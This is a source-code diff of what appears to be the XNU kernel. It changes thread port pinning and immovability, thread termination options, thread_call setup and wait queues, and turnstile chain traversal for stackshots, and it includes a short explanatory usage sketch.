+       int options = TH_OPTION_NOCRED | TH_OPTION_NOSUSP | TH_OPTION_WORKQ | TH_OPTION_IMMOVABLE;
        return thread_create_waiting_internal(task, continuation, NULL,
                   kThreadWaitParkedWorkQueue, options, new_thread);
 }
@@ -2068,8 +2130,6 @@ thread_wire_internal(
                return KERN_INVALID_ARGUMENT;
        }
 
-       assert(host_priv == &realhost);
-
        if (prev_state) {
                *prev_state = (thread->options & TH_OPT_VMPRIV) != 0;
        }
@@ -3163,7 +3223,7 @@ thread_port_with_flavor_notify(mach_msg_header_t *msg)
                ip_unlock(port);
                return;
        }
-       thread = (thread_t)port->ip_kobject;
+       thread = (thread_t)ipc_kobject_get(port);
        kotype = ip_kotype(port);
        if (thread != THREAD_NULL) {
                assert((IKOT_THREAD_READ == kotype) || (IKOT_THREAD_INSPECT == kotype));
@@ -3176,28 +3236,39 @@ thread_port_with_flavor_notify(mach_msg_header_t *msg)
                return;
        }
 
+       if (kotype == IKOT_THREAD_READ) {
+               flavor = THREAD_FLAVOR_READ;
+       } else {
+               flavor = THREAD_FLAVOR_INSPECT;
+       }
+
        thread_mtx_lock(thread);
        ip_lock(port);
-       require_ip_active(port);
        /*
+        * If the port is no longer active, then ipc_thread_terminate() ran
+        * and destroyed the kobject already. Just deallocate the thread
+        * ref we took and go away.
+        *
+        * It is also possible that several nsrequests are in flight;
+        * only one will NULL out the port entry, and that is the one
+        * that gets to dealloc the port.
+        *
         * Check for a stale no-senders notification. A call to any function
         * that vends out send rights to this port could resurrect it between
         * this notification being generated and actually being handled here.
         */
-       if (port->ip_srights > 0) {
+       if (!ip_active(port) ||
+           thread->ith_thread_ports[flavor] != port ||
+           port->ip_srights > 0) {
                ip_unlock(port);
                thread_mtx_unlock(thread);
                thread_deallocate(thread);
                return;
        }
-       if (kotype == IKOT_THREAD_READ) {
-               flavor = THREAD_FLAVOR_READ;
-       } else {
-               flavor = THREAD_FLAVOR_INSPECT;
-       }
-       assert(thread->ith_self[flavor] == port);
-       thread->ith_self[flavor] = IP_NULL;
-       port->ip_kobject = IKOT_NONE;
+
+       assert(thread->ith_thread_ports[flavor] == port);
+       thread->ith_thread_ports[flavor] = IP_NULL;
+       ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE);
        ip_unlock(port);
        thread_mtx_unlock(thread);
        thread_deallocate(thread);
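
The thread.c changes above add pinned/immovable variants of thread creation. A hedged sketch of how a KERNEL_PRIVATE client might pick between them; some_task is a placeholder, and the reference handling shown is an assumption rather than something taken from the diff:

	thread_t th = THREAD_NULL;

	/* Control port created immovable: it cannot be moved or stashed
	 * outside the owning task's IPC space. */
	if (thread_create_immovable(some_task, &th) == KERN_SUCCESS) {
		thread_start(th);
		thread_deallocate(th);   /* assumed: caller owns the creation ref */
	}

	/* Control port pinned as well as immovable. Per the deprecation note,
	 * such a thread is torn down via thread_terminate_pinned(), which uses
	 * TH_TERMINATE_OPTION_UNPIN so the pinned right is unpinned first. */
	if (thread_create_pinned(some_task, &th) == KERN_SUCCESS) {
		thread_terminate_pinned(th);
		thread_deallocate(th);
	}
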
index 475f0c678f2852ce480da733049452404e3e2d33..9f61d1fc4b6c874d4f6bf1e983722bad887be70d 100644 (file)
@@ -256,6 +256,9 @@ struct thread {
        vm_offset_t             kernel_stack;   /* current kernel stack */
        vm_offset_t             reserved_stack; /* reserved kernel stack */
 
+       /*** Machine-dependent state ***/
+       struct machine_thread   machine;
+
 #if KASAN
        struct kasan_thread_data kasan_data;
 #endif
@@ -516,13 +519,14 @@ struct thread {
 
        /* Miscellaneous bits guarded by mutex */
        uint32_t
-           active:1,                                   /* Thread is active and has not been terminated */
-           started:1,                                  /* Thread has been started after creation */
-           static_param:1,                             /* Disallow policy parameter changes */
-           inspection:1,                               /* TRUE when task is being inspected by crash reporter */
-           policy_reset:1,                             /* Disallow policy parameter changes on terminating threads */
-           suspend_parked:1,                           /* thread parked in thread_suspended */
-           corpse_dup:1,                               /* TRUE when thread is an inactive duplicate in a corpse */
+           active:1,           /* Thread is active and has not been terminated */
+           ipc_active:1,       /* IPC with the thread ports is allowed */
+           started:1,          /* Thread has been started after creation */
+           static_param:1,     /* Disallow policy parameter changes */
+           inspection:1,       /* TRUE when task is being inspected by crash reporter */
+           policy_reset:1,     /* Disallow policy parameter changes on terminating threads */
+           suspend_parked:1,   /* thread parked in thread_suspended */
+           corpse_dup:1,       /* TRUE when thread is an inactive duplicate in a corpse */
        :0;
 
        decl_lck_mtx_data(, mutex);
@@ -531,8 +535,9 @@ struct thread {
         * Different flavors of thread port.
         * These flavors THREAD_FLAVOR_* are defined in mach_types.h
         */
-       struct ipc_port         *ith_self[THREAD_SELF_PORT_COUNT];        /* does not hold right */
+       struct ipc_port         *ith_thread_ports[THREAD_SELF_PORT_COUNT];        /* does not hold right */
        struct ipc_port         *ith_settable_self;        /* a send right */
+       struct ipc_port         *ith_self;                 /* immovable/pinned thread port */
        struct ipc_port         *ith_special_reply_port;   /* ref to special reply port */
        struct exception_action *exc_actions;
 
@@ -593,9 +598,6 @@ struct thread {
        void                   *hv_thread_target;
 #endif /* HYPERVISOR */
 
-       /*** Machine-dependent state ***/
-       struct machine_thread   machine;
-
        /* Statistics accumulated per-thread and aggregated per-task */
        uint32_t                syscalls_unix;
        uint32_t                syscalls_mach;
@@ -662,13 +664,13 @@ struct thread {
 #if     SCHED_TRACE_THREAD_WAKEUPS
        uintptr_t               thread_wakeup_bt[64];
 #endif
-       turnstile_update_flags_t inheritor_flags; /* inheritor flags for inheritor field */
-       block_hint_t            pending_block_hint;
-       block_hint_t            block_hint;      /* What type of primitive last caused us to block. */
-       integer_t               decompressions;  /* Per-thread decompressions counter to be added to per-task decompressions counter */
-       int                     thread_region_page_shift; /* Page shift that this thread would like to use when */
-                                                         /* introspecting a task. This is currently being used */
-                                                         /* by footprint which uses a thread for each task being inspected. */
+       turnstile_update_flags_t inheritor_flags;          /* inheritor flags for inheritor field */
+       block_hint_t             pending_block_hint;
+       block_hint_t             block_hint;               /* What type of primitive last caused us to block. */
+       integer_t                decompressions;           /* Per-thread decompressions counter to be added to per-task decompressions counter */
+       int                      thread_region_page_shift; /* Page shift that this thread would like to use when */
+                                                          /* introspecting a task. This is currently being used */
+                                                          /* by footprint which uses a thread for each task being inspected. */
 };
 
 #define ith_state           saved.receive.state
@@ -740,8 +742,14 @@ extern void                     thread_read_deallocate(
 
 extern void                     thread_terminate_self(void);
 
+__options_decl(thread_terminate_options_t, uint32_t, {
+       TH_TERMINATE_OPTION_NONE,
+       TH_TERMINATE_OPTION_UNPIN
+});
+
 extern kern_return_t    thread_terminate_internal(
-       thread_t                thread);
+       thread_t                    thread,
+       thread_terminate_options_t  options);
 
 extern void                     thread_start(
        thread_t                        thread) __attribute__ ((noinline));
@@ -1067,10 +1075,18 @@ extern kern_return_t    thread_create_with_continuation(
        thread_t *new_thread,
        thread_continue_t continuation);
 
-extern kern_return_t thread_create_waiting(task_t               task,
-    thread_continue_t    continuation,
-    event_t              event,
-    thread_t             *new_thread);
+/* thread_create_waiting options */
+__options_decl(th_create_waiting_options_t, uint32_t, {
+       TH_CREATE_WAITING_OPTION_PINNED = 0x10,
+       TH_CREATE_WAITING_OPTION_IMMOVABLE = 0x20,
+});
+#define TH_CREATE_WAITING_OPTION_MASK          0x30
+
+extern kern_return_t thread_create_waiting(task_t    task,
+    thread_continue_t              continuation,
+    event_t                        event,
+    th_create_waiting_options_t    options,
+    thread_t                       *new_thread);
 
 extern kern_return_t    thread_create_workq_waiting(
        task_t                  task,
@@ -1381,6 +1397,7 @@ void thread_clear_eager_preempt(thread_t thread);
 void thread_set_honor_qlimit(thread_t thread);
 void thread_clear_honor_qlimit(thread_t thread);
 extern ipc_port_t convert_thread_to_port(thread_t);
+extern ipc_port_t convert_thread_to_port_pinned(thread_t);
 extern ipc_port_t convert_thread_inspect_to_port(thread_inspect_t);
 extern ipc_port_t convert_thread_read_to_port(thread_read_t);
 extern boolean_t is_vm_privileged(void);
@@ -1391,6 +1408,9 @@ extern void thread_iokit_tls_set(uint32_t index, void * data);
 extern void thread_port_with_flavor_notify(mach_msg_header_t *msg);
 extern int thread_self_region_page_shift(void);
 extern void thread_self_region_page_shift_set(int pgshift);
+extern kern_return_t thread_create_pinned(task_t task, thread_t *new_thread);
+extern kern_return_t thread_create_immovable(task_t task, thread_t *new_thread);
+extern kern_return_t thread_terminate_pinned(thread_t thread);
 #endif /* KERNEL_PRIVATE */
 
 __END_DECLS
index ccfb5eb3d41f5086fed455388fe6775956e322c6..679c11621df2425fdbbb344fbbc3aabd3c592911 100644 (file)
@@ -157,9 +157,11 @@ thread_start_in_assert_wait(
  */
 kern_return_t
 thread_terminate_internal(
-       thread_t                        thread)
+       thread_t                        thread,
+       thread_terminate_options_t      options)
 {
        kern_return_t           result = KERN_SUCCESS;
+       boolean_t               test_pin_bit = false;
 
        thread_mtx_lock(thread);
 
@@ -173,6 +175,8 @@ thread_terminate_internal(
                } else {
                        thread_start(thread);
                }
+               /* This bit can be reliably tested only if the thread is still active */
+               test_pin_bit = (options == TH_TERMINATE_OPTION_UNPIN) ? true : false;
        } else {
                result = KERN_TERMINATED;
        }
@@ -181,6 +185,13 @@ thread_terminate_internal(
                thread_affinity_terminate(thread);
        }
 
+       /*
+        * <rdar://problem/53562036> thread_terminate shouldn't be allowed on pthread
+        * Until thread_terminate is disallowed for pthreads, always unpin the pinned port
+        * when the thread is being terminated.
+        */
+       ipc_thread_port_unpin(thread->ith_self, test_pin_bit);
+
        thread_mtx_unlock(thread);
 
        if (thread != current_thread() && result == KERN_SUCCESS) {
@@ -206,7 +217,7 @@ thread_terminate(
                return KERN_FAILURE;
        }
 
-       kern_return_t result = thread_terminate_internal(thread);
+       kern_return_t result = thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE);
 
        /*
         * If a kernel thread is terminating itself, force handle the APC_AST here.
@@ -225,6 +236,20 @@ thread_terminate(
        return result;
 }
 
+kern_return_t
+thread_terminate_pinned(
+       thread_t                thread)
+{
+       if (thread == THREAD_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       assert(thread->task != kernel_task);
+
+       kern_return_t result = thread_terminate_internal(thread, TH_TERMINATE_OPTION_UNPIN);
+       return result;
+}
+
 /*
  * Suspend execution of the specified thread.
  * This is a recursive-style suspension of the thread, a count of
index afe86a612c74f43a737953a1cf4bf65c420a27a8..6bcca37203eed56ffa6d2fa344194163881a0ca9 100644 (file)
@@ -56,8 +56,6 @@
 static ZONE_DECLARE(thread_call_zone, "thread_call",
     sizeof(thread_call_data_t), ZC_NOENCRYPT);
 
-static struct waitq daemon_waitq;
-
 typedef enum {
        TCF_ABSOLUTE    = 0,
        TCF_CONTINUOUS  = 1,
@@ -92,6 +90,8 @@ static struct thread_call_group {
        uint32_t                target_thread_count;
 
        thread_call_group_flags_t tcg_flags;
+
+       struct waitq            waiters_waitq;
 } thread_call_groups[THREAD_CALL_INDEX_MAX] = {
        [THREAD_CALL_INDEX_HIGH] = {
                .tcg_name               = "high",
@@ -458,6 +458,8 @@ thread_call_group_setup(thread_call_group_t group)
 
        timer_call_setup(&group->dealloc_timer, thread_call_dealloc_timer, group);
 
+       waitq_init(&group->waiters_waitq, SYNC_POLICY_DISABLE_IRQ);
+
        /* Reverse the wait order so we re-use the most recently parked thread from the pool */
        waitq_init(&group->idle_waitq, SYNC_POLICY_REVERSED | SYNC_POLICY_DISABLE_IRQ);
 }
@@ -530,23 +532,57 @@ thread_call_initialize(void)
 }
 
 void
-thread_call_setup(
+thread_call_setup_with_options(
        thread_call_t                   call,
        thread_call_func_t              func,
-       thread_call_param_t             param0)
+       thread_call_param_t             param0,
+       thread_call_priority_t          pri,
+       thread_call_options_t           options)
 {
        bzero(call, sizeof(*call));
 
        *call = (struct thread_call) {
                .tc_func = func,
                .tc_param0 = param0,
-
-               /*
-                * Thread calls default to the HIGH group
-                * unless otherwise specified.
-                */
-               .tc_index = THREAD_CALL_INDEX_HIGH,
        };
+
+       switch (pri) {
+       case THREAD_CALL_PRIORITY_HIGH:
+               call->tc_index = THREAD_CALL_INDEX_HIGH;
+               break;
+       case THREAD_CALL_PRIORITY_KERNEL:
+               call->tc_index = THREAD_CALL_INDEX_KERNEL;
+               break;
+       case THREAD_CALL_PRIORITY_USER:
+               call->tc_index = THREAD_CALL_INDEX_USER;
+               break;
+       case THREAD_CALL_PRIORITY_LOW:
+               call->tc_index = THREAD_CALL_INDEX_LOW;
+               break;
+       case THREAD_CALL_PRIORITY_KERNEL_HIGH:
+               call->tc_index = THREAD_CALL_INDEX_KERNEL_HIGH;
+               break;
+       default:
+               panic("Invalid thread call pri value: %d", pri);
+               break;
+       }
+
+       if (options & THREAD_CALL_OPTIONS_ONCE) {
+               call->tc_flags |= THREAD_CALL_ONCE;
+       }
+       if (options & THREAD_CALL_OPTIONS_SIGNAL) {
+               call->tc_flags |= THREAD_CALL_SIGNAL | THREAD_CALL_ONCE;
+       }
+}
+
+void
+thread_call_setup(
+       thread_call_t                   call,
+       thread_call_func_t              func,
+       thread_call_param_t             param0)
+{
+       thread_call_setup_with_options(call, func, param0,
+           THREAD_CALL_PRIORITY_HIGH, 0);
 }
 
 static void
@@ -592,8 +628,8 @@ _internal_call_allocate(thread_call_func_t func, thread_call_param_t param0)
        thread_call_internal_queue_count--;
 
        thread_call_setup(call, func, param0);
-       call->tc_refs = 0;
-       call->tc_flags = 0; /* THREAD_CALL_ALLOC not set, do not free back to zone */
+       /* THREAD_CALL_ALLOC not set, do not free back to zone */
+       assert((call->tc_flags & THREAD_CALL_ALLOC) == 0);
        enable_ints_and_unlock(group, s);
 
        return call;
@@ -953,35 +989,11 @@ thread_call_allocate_with_options(
        thread_call_priority_t          pri,
        thread_call_options_t           options)
 {
-       thread_call_t call = thread_call_allocate(func, param0);
-
-       switch (pri) {
-       case THREAD_CALL_PRIORITY_HIGH:
-               call->tc_index = THREAD_CALL_INDEX_HIGH;
-               break;
-       case THREAD_CALL_PRIORITY_KERNEL:
-               call->tc_index = THREAD_CALL_INDEX_KERNEL;
-               break;
-       case THREAD_CALL_PRIORITY_USER:
-               call->tc_index = THREAD_CALL_INDEX_USER;
-               break;
-       case THREAD_CALL_PRIORITY_LOW:
-               call->tc_index = THREAD_CALL_INDEX_LOW;
-               break;
-       case THREAD_CALL_PRIORITY_KERNEL_HIGH:
-               call->tc_index = THREAD_CALL_INDEX_KERNEL_HIGH;
-               break;
-       default:
-               panic("Invalid thread call pri value: %d", pri);
-               break;
-       }
+       thread_call_t call = zalloc(thread_call_zone);
 
-       if (options & THREAD_CALL_OPTIONS_ONCE) {
-               call->tc_flags |= THREAD_CALL_ONCE;
-       }
-       if (options & THREAD_CALL_OPTIONS_SIGNAL) {
-               call->tc_flags |= THREAD_CALL_SIGNAL | THREAD_CALL_ONCE;
-       }
+       thread_call_setup_with_options(call, func, param0, pri, options);
+       call->tc_refs = 1;
+       call->tc_flags |= THREAD_CALL_ALLOC;
 
        return call;
 }
@@ -1039,13 +1051,8 @@ thread_call_allocate(
        thread_call_func_t              func,
        thread_call_param_t             param0)
 {
-       thread_call_t   call = zalloc(thread_call_zone);
-
-       thread_call_setup(call, func, param0);
-       call->tc_refs = 1;
-       call->tc_flags = THREAD_CALL_ALLOC;
-
-       return call;
+       return thread_call_allocate_with_options(func, param0,
+                  THREAD_CALL_PRIORITY_HIGH, 0);
 }
 
 /*
@@ -1422,7 +1429,7 @@ thread_call_wake(
                if (group->idle_count) {
                        __assert_only kern_return_t kr;
 
-                       kr = waitq_wakeup64_one(&group->idle_waitq, NO_EVENT64,
+                       kr = waitq_wakeup64_one(&group->idle_waitq, CAST_EVENT64_T(group),
                            THREAD_AWAKENED, WAITQ_ALL_PRIORITIES);
                        assert(kr == KERN_SUCCESS);
 
@@ -1438,7 +1445,7 @@ thread_call_wake(
                        if (thread_call_group_should_add_thread(group) &&
                            os_atomic_cmpxchg(&thread_call_daemon_awake,
                            false, true, relaxed)) {
-                               waitq_wakeup64_all(&daemon_waitq, NO_EVENT64,
+                               waitq_wakeup64_all(&daemon_waitq, CAST_EVENT64_T(&thread_call_daemon_awake),
                                    THREAD_AWAKENED, WAITQ_ALL_PRIORITIES);
                        }
                }
@@ -1498,10 +1505,11 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s)
 
        bool repend = false;
        bool signal = call->tc_flags & THREAD_CALL_SIGNAL;
+       bool alloc = call->tc_flags & THREAD_CALL_ALLOC;
 
        call->tc_finish_count++;
 
-       if (!signal) {
+       if (!signal && alloc) {
                /* The thread call thread owns a ref until the call is finished */
                if (call->tc_refs <= 0) {
                        panic("thread_call_finish: detected over-released thread call: %p", call);
@@ -1512,7 +1520,8 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s)
        thread_call_flags_t old_flags = call->tc_flags;
        call->tc_flags &= ~(THREAD_CALL_RESCHEDULE | THREAD_CALL_RUNNING | THREAD_CALL_WAIT);
 
-       if (call->tc_refs != 0 && (old_flags & THREAD_CALL_RESCHEDULE) != 0) {
+       if ((!alloc || call->tc_refs != 0) &&
+           (old_flags & THREAD_CALL_RESCHEDULE) != 0) {
                assert(old_flags & THREAD_CALL_ONCE);
                thread_call_flavor_t flavor = thread_call_get_flavor(call);
 
@@ -1541,7 +1550,7 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s)
                }
        }
 
-       if (!signal && (call->tc_refs == 0)) {
+       if (!signal && alloc && call->tc_refs == 0) {
                if ((old_flags & THREAD_CALL_WAIT) != 0) {
                        panic("Someone waiting on a thread call that is scheduled for free: %p\n", call->tc_func);
                }
@@ -1557,12 +1566,19 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s)
 
        if ((old_flags & THREAD_CALL_WAIT) != 0) {
                /*
-                * Dropping lock here because the sched call for the
-                * high-pri group can take the big lock from under
-                * a thread lock.
+                * This may wake up a thread with a registered sched_call.
+                * That call might need the group lock, so we drop the lock
+                * to avoid deadlocking.
+                *
+                * We also must use a separate waitq from the idle waitq, as
+                * this path goes waitq lock->thread lock->group lock, but
+                * the idle wait goes group lock->waitq_lock->thread_lock.
                 */
                thread_call_unlock(group);
-               thread_wakeup((event_t)call);
+
+               waitq_wakeup64_all(&group->waiters_waitq, CAST_EVENT64_T(call),
+                   THREAD_AWAKENED, WAITQ_ALL_PRIORITIES);
+
                thread_call_lock_spin(group);
                /* THREAD_CALL_SIGNAL call may have been freed */
        }
@@ -1668,9 +1684,20 @@ thread_call_thread(
                 */
                bool needs_finish = false;
                if (call->tc_flags & THREAD_CALL_ALLOC) {
+                       call->tc_refs++;        /* Delay free until we're done */
+               }
+               if (call->tc_flags & (THREAD_CALL_ALLOC | THREAD_CALL_ONCE)) {
+                       /*
+                        * If THREAD_CALL_ONCE is used, and the timer wasn't
+                        * THREAD_CALL_ALLOC, then clients swear they will use
+                        * thread_call_cancel_wait() before destroying
+                        * the thread call.
+                        *
+                        * Else, the storage for the thread call might have
+                        * disappeared when thread_call_invoke() ran.
+                        */
                        needs_finish = true;
                        call->tc_flags |= THREAD_CALL_RUNNING;
-                       call->tc_refs++;        /* Delay free until we're done */
                }
 
                thc_state.thc_call = call;
@@ -1699,7 +1726,7 @@ thread_call_thread(
                s = disable_ints_and_lock(group);
 
                if (needs_finish) {
-                       /* Release refcount, may free */
+                       /* Release refcount, may free, may temporarily drop lock */
                        thread_call_finish(call, group, &s);
                }
        }
@@ -1740,7 +1767,7 @@ thread_call_thread(
                }
 
                /* Wait for more work (or termination) */
-               wres = waitq_assert_wait64(&group->idle_waitq, NO_EVENT64, THREAD_INTERRUPTIBLE, 0);
+               wres = waitq_assert_wait64(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_INTERRUPTIBLE, 0);
                if (wres != THREAD_WAITING) {
                        panic("kcall worker unable to assert wait?");
                }
@@ -1752,7 +1779,7 @@ thread_call_thread(
                if (group->idle_count < group->target_thread_count) {
                        group->idle_count++;
 
-                       waitq_assert_wait64(&group->idle_waitq, NO_EVENT64, THREAD_UNINT, 0); /* Interrupted means to exit */
+                       waitq_assert_wait64(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_UNINT, 0); /* Interrupted means to exit */
 
                        enable_ints_and_unlock(group, s);
 
@@ -1815,7 +1842,7 @@ thread_call_daemon_continue(__unused void *arg)
                }
        } while (os_atomic_load(&thread_call_daemon_awake, relaxed));
 
-       waitq_assert_wait64(&daemon_waitq, NO_EVENT64, THREAD_UNINT, 0);
+       waitq_assert_wait64(&daemon_waitq, CAST_EVENT64_T(&thread_call_daemon_awake), THREAD_UNINT, 0);
 
        if (os_atomic_load(&thread_call_daemon_awake, relaxed)) {
                clear_wait(current_thread(), THREAD_AWAKENED);
@@ -2025,7 +2052,7 @@ thread_call_dealloc_timer(
                if (now > group->idle_timestamp + thread_call_dealloc_interval_abs) {
                        terminated = true;
                        group->idle_count--;
-                       res = waitq_wakeup64_one(&group->idle_waitq, NO_EVENT64,
+                       res = waitq_wakeup64_one(&group->idle_waitq, CAST_EVENT64_T(group),
                            THREAD_INTERRUPTED, WAITQ_ALL_PRIORITIES);
                        if (res != KERN_SUCCESS) {
                                panic("Unable to wake up idle thread for termination?");
@@ -2066,6 +2093,11 @@ thread_call_dealloc_timer(
  *
  * Takes the thread call lock locked, returns unlocked
  *      This lets us avoid a spurious take/drop after waking up from thread_block
+ *
+ * This thread could be a thread call thread itself, blocking and therefore making a
+ * sched_call upcall into the thread call subsystem, needing the group lock.
+ * However, we're saved from deadlock because the 'block' upcall is made in
+ * thread_block, not in assert_wait.
  */
 static bool
 thread_call_wait_once_locked(thread_call_t call, spl_t s)
@@ -2083,7 +2115,7 @@ thread_call_wait_once_locked(thread_call_t call, spl_t s)
        /* call is running, so we have to wait for it */
        call->tc_flags |= THREAD_CALL_WAIT;
 
-       wait_result_t res = assert_wait(call, THREAD_UNINT);
+       wait_result_t res = waitq_assert_wait64(&group->waiters_waitq, CAST_EVENT64_T(call), THREAD_UNINT, 0);
        if (res != THREAD_WAITING) {
                panic("Unable to assert wait: %d", res);
        }
@@ -2162,7 +2194,9 @@ thread_call_wait_locked(thread_call_t call, spl_t s)
        while (call->tc_finish_count < submit_count) {
                call->tc_flags |= THREAD_CALL_WAIT;
 
-               wait_result_t res = assert_wait(call, THREAD_UNINT);
+               wait_result_t res = waitq_assert_wait64(&group->waiters_waitq,
+                   CAST_EVENT64_T(call), THREAD_UNINT, 0);
+
                if (res != THREAD_WAITING) {
                        panic("Unable to assert wait: %d", res);
                }
index 254ef28b8afc3548f284c0602cb10c5a6bbca91f..1e0f2fb96303c0d0421d29125a9fdd116257b342 100644 (file)
@@ -400,6 +400,13 @@ extern void             thread_call_setup(
        thread_call_func_t              func,
        thread_call_param_t             param0);
 
+extern void             thread_call_setup_with_options(
+       thread_call_t                   call,
+       thread_call_func_t              func,
+       thread_call_param_t             param0,
+       thread_call_priority_t          pri,
+       thread_call_options_t           options);
+
 extern void             thread_call_delayed_timer_rescan_all(void);
 extern uint64_t         thread_call_get_armed_deadline(thread_call_t call);
 
index 14792548567bc99b1fd25870c27dec07d94e77c6..ca8228f6d88402d1389c0a281cf1f8742cc78c44 100644 (file)
@@ -812,8 +812,8 @@ thread_group_vm_add(void)
        thread_set_thread_group(current_thread(), thread_group_find_by_id_and_retain(THREAD_GROUP_VM), false);
 }
 
-uint64_t
-kdp_thread_group_get_flags(struct thread_group *tg)
+uint32_t
+thread_group_get_flags(struct thread_group *tg)
 {
        return tg->tg_flags;
 }
index f18259bd788e84b70736e1ac1af508dbadfaea64..c7e78d05e219a893c74382dafdb4497e84a1b848 100644 (file)
@@ -91,7 +91,7 @@ cluster_type_t  thread_group_recommendation(struct thread_group *tg);
 
 typedef         void (*thread_group_iterate_fn_t)(void*, int, struct thread_group *);
 kern_return_t   thread_group_iterate_stackshot(thread_group_iterate_fn_t callout, void *arg);
-uint64_t kdp_thread_group_get_flags(struct thread_group *);
+uint32_t        thread_group_get_flags(struct thread_group *);
 boolean_t       thread_group_smp_restricted(struct thread_group *tg);
 void            thread_group_update_recommendation(struct thread_group *tg, cluster_type_t new_recommendation);
 
index baa08bf2735f5a8fd07db391edda6748232de9a6..8d98e3989c8fa228c3a8a98def0f17ed7b89ac97 100644 (file)
@@ -3188,59 +3188,72 @@ turnstile_stats_update(
 static uint64_t
 kdp_turnstile_traverse_inheritor_chain(struct turnstile *ts, uint64_t *flags, uint8_t *hops)
 {
+       uint8_t unknown_hops;
+
        if (waitq_held(&ts->ts_waitq)) {
                *flags |= STACKSHOT_TURNSTILE_STATUS_LOCKED_WAITQ;
                return 0;
        }
 
        *hops = *hops + 1;
+       unknown_hops = *hops;
+
+       /*
+        * If a turnstile is inheriting our priority, recurse.  If we get back *exactly* UNKNOWN,
+        * continue on, since we may be able to give a more specific answer.  To
+        * give an accurate hops count, we reset *hops, saving the recursive value in
+        * unknown_hops to use if we can't give a better answer.
+        */
+       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_TURNSTILE) {
+               uint8_t pre_hops = *hops;
+               uint64_t ret = kdp_turnstile_traverse_inheritor_chain(ts->ts_inheritor, flags, hops);
+               /*
+                * Note that while flags is usually |=ed, we're checking with != here to
+                * make sure we only replace *exactly* UNKNOWN
+                */
+               if (ret != 0 || *flags != STACKSHOT_TURNSTILE_STATUS_UNKNOWN) {
+                       return ret;
+               }
+               /* restore original hops value, saving the new one if we fall through to unknown */
+               unknown_hops = *hops;
+               *hops = pre_hops;
+               *flags = 0;
+       }
+
+       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_THREAD) {
+               *flags |= STACKSHOT_TURNSTILE_STATUS_THREAD;
+               return (uint64_t) thread_tid(ts->ts_inheritor);
+       }
+
+       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_WORKQ) {
+               *flags |= STACKSHOT_TURNSTILE_STATUS_WORKQUEUE;
+               return VM_KERNEL_UNSLIDE_OR_PERM(ts->ts_inheritor);
+       }
 
        /*
         * If we found a send turnstile, try to get the task that the turnstile's
         * port is in the ipc space of
         */
        if (turnstile_is_send_turnstile(ts)) {
-               task_t dest_task = TASK_NULL;
                ipc_port_t port = (ipc_port_t)ts->ts_proprietor;
 
                if (port && ip_active(port)) {
                        if (ip_lock_held_kdp(port)) {
                                *flags |= STACKSHOT_TURNSTILE_STATUS_HELD_IPLOCK;
-
                                return 0;
-                       } else {
-                               if (port->ip_receiver_name != 0) {
-                                       if (port->ip_receiver) {
-                                               ipc_space_t space = (ipc_space_t) port->ip_receiver;
-
-                                               dest_task = space->is_task;
-                                       } else {
-                                               return 0;
-                                       }
-                               }
                        }
-               }
+                       if (port->ip_receiver_name != 0 && port->ip_receiver) {
+                               ipc_space_t space = (ipc_space_t) port->ip_receiver;
+                               task_t dest_task = space->is_task;
 
-               if (dest_task != TASK_NULL) {
-                       *flags |= STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK;
-                       return pid_from_task(dest_task);
+                               if (dest_task != TASK_NULL) {
+                                       *flags |= STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK;
+                                       return pid_from_task(dest_task);
+                               }
+                       }
                }
        }
 
-       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_TURNSTILE) {
-               return kdp_turnstile_traverse_inheritor_chain(ts->ts_inheritor, flags, hops);
-       }
-
-       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_THREAD) {
-               *flags |= STACKSHOT_TURNSTILE_STATUS_THREAD;
-               return (uint64_t) thread_tid(ts->ts_inheritor);
-       }
-
-       if (ts->ts_inheritor_flags & TURNSTILE_INHERITOR_WORKQ) {
-               *flags |= STACKSHOT_TURNSTILE_STATUS_WORKQUEUE;
-               return VM_KERNEL_UNSLIDE_OR_PERM(ts->ts_inheritor);
-       }
-
        if (turnstile_is_receive_turnstile(ts)) {
                ipc_port_t port = (ipc_port_t)ts->ts_proprietor;
                if (port && ip_active(port)) {
@@ -3260,6 +3273,7 @@ kdp_turnstile_traverse_inheritor_chain(struct turnstile *ts, uint64_t *flags, ui
                }
        }
 
+       *hops = unknown_hops;
        *flags |= STACKSHOT_TURNSTILE_STATUS_UNKNOWN;
        return 0;
 }
index 0329eeea676839bbbac9cdc1648c2f2915e258ec..07e60a0c1aea73b30ca779f6cf21baf1626269f0 100644 (file)
@@ -58,8 +58,8 @@
  * most Mach exceptions.
  */
 
-static const void                      *ux_handler_kobject    = NULL;
-SECURITY_READ_ONLY_LATE(ipc_port_t)     ux_handler_port       = IP_NULL;
+static SECURITY_READ_ONLY_LATE(const void *)    ux_handler_kobject    = NULL;
+SECURITY_READ_ONLY_LATE(ipc_port_t)             ux_handler_port       = IP_NULL;
 
 /*
  * init is called early in Mach initialization
index 1ef23d043ac16388bf8d1ec075437f3f2b5fc3ad..9d33499119e11ea6b5fd45b16e7b2f95be0cb09b 100644 (file)
@@ -64,6 +64,7 @@
  */
 
 #define ZALLOC_ALLOW_DEPRECATED 1
+#if !ZALLOC_TEST
 #include <mach/mach_types.h>
 #include <mach/vm_param.h>
 #include <mach/kern_return.h>
@@ -94,6 +95,7 @@
 #include <vm/vm_map.h>
 #include <vm/vm_kern.h>
 #include <vm/vm_page.h>
+#include <vm/vm_pageout.h>
 #include <vm/vm_compressor.h> /* C_SLOT_PACKED_PTR* */
 
 #include <pexpert/pexpert.h>
 #include <san/kasan.h>
 
 #if KASAN_ZALLOC
+/*
+ * Set to 0 to debug poisoning and ZC_ZFREE_CLEARMEM validation under kasan.
+ * Otherwise they are double-duty with what kasan already does.
+ */
+#define ZALLOC_ENABLE_POISONING 0
 #define ZONE_ENABLE_LOGGING 0
 #elif DEBUG || DEVELOPMENT
